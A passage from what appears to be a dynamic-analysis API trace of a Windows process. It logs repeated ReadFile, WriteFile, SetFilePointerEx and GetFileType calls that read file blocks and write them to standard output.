dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.920] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.920] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] GetFileType (hFile=0x50) returned 0x1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] GetFileType (hFile=0x50) returned 0x1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] GetFileType (hFile=0x50) returned 0x1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] GetFileType (hFile=0x50) returned 0x1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] GetFileType (hFile=0x50) returned 0x1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.920] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.920] GetFileType (hFile=0x50) returned 0x1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] GetFileType (hFile=0x50) returned 0x1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] GetFileType (hFile=0x50) returned 0x1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.921] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.921] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.921] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] GetFileType (hFile=0x50) returned 0x1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] GetFileType (hFile=0x50) returned 0x1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.921] GetFileType (hFile=0x50) returned 0x1 [0205.921] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] GetFileType (hFile=0x50) returned 0x1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] GetFileType (hFile=0x50) returned 0x1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] GetFileType (hFile=0x50) returned 0x1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] GetFileType (hFile=0x50) returned 0x1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] GetFileType (hFile=0x50) returned 0x1 [0205.922] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.922] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.923] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.923] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.923] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] GetFileType (hFile=0x50) returned 0x1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] GetFileType (hFile=0x50) returned 0x1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] GetFileType (hFile=0x50) returned 0x1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] GetFileType (hFile=0x50) returned 0x1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.923] GetFileType (hFile=0x50) returned 0x1 [0205.923] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] GetFileType (hFile=0x50) returned 0x1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] GetFileType (hFile=0x50) returned 0x1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] GetFileType (hFile=0x50) returned 0x1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.924] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.924] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.924] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.924] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] GetFileType (hFile=0x50) returned 0x1 [0205.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.924] GetFileType (hFile=0x50) returned 0x1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] GetFileType (hFile=0x50) returned 0x1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] GetFileType (hFile=0x50) returned 0x1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] GetFileType (hFile=0x50) returned 0x1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] GetFileType (hFile=0x50) returned 0x1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] GetFileType (hFile=0x50) returned 0x1 [0205.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.925] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] GetFileType (hFile=0x50) returned 0x1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.926] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.926] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.926] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] GetFileType (hFile=0x50) returned 0x1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] GetFileType (hFile=0x50) returned 0x1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] GetFileType (hFile=0x50) returned 0x1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] GetFileType (hFile=0x50) returned 0x1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.926] GetFileType (hFile=0x50) returned 0x1 [0205.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] GetFileType (hFile=0x50) returned 0x1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] GetFileType (hFile=0x50) returned 0x1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] GetFileType (hFile=0x50) returned 0x1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.927] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.927] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.927] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.927] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] GetFileType (hFile=0x50) returned 0x1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] GetFileType (hFile=0x50) returned 0x1 [0205.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.927] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] GetFileType (hFile=0x50) returned 0x1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] GetFileType (hFile=0x50) returned 0x1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] GetFileType (hFile=0x50) returned 0x1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] GetFileType (hFile=0x50) returned 0x1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] GetFileType (hFile=0x50) returned 0x1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.928] GetFileType (hFile=0x50) returned 0x1 [0205.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.929] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.929] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.929] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.929] GetFileType (hFile=0x50) returned 0x1 [0205.929] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.929] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.929] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.930] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.931] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, 